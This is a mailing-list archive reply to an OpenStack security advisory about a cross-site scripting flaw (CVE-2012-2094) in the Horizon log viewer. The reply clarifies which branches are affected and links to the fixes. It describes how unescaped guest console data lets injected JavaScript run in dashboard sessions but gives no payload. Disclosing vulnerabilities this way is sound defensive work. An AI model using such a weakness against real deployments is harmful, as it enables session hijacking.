← Back to team overview

openstack team mailing list archive

Re: [OSSA 2012-004] XSS vulnerability in Horizon log viewer

 

On 04/17/2012 08:51 AM, Russell Bryant wrote:
> OpenStack Security Advisory: 2012-004
> CVE: 2012-2094
> Date: April 17, 2012
> Title: XSS vulnerability in Horizon log viewer
> Impact: High
> Reporter: Matthias Weckbecker <mweckbecker@xxxxxxx>
> Products: Horizon
> Affects: All versions

One clarification: this issue is *not* present in the stable/diablo
branch of Horizon.

> Description:
> Matthias Weckbecker reported a vulnerability in Horizon. He noted that
> the log viewer refreshing mechanism does not escape the data fetched
> from guest consoles. This means that HTML with Javascript code gets
> interpreted as such, resulting in the ability to inject code into a
> dashboard session.
> 
> Fixes:
>   Folsom: https://review.openstack.org/#/c/6618/
>   2012.1: https://review.openstack.org/#/c/6621/
> 
> References:
>   http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-2094
>   https://bugs.launchpad.net/horizon/+bug/977944
> 


-- 
Russell Bryant


References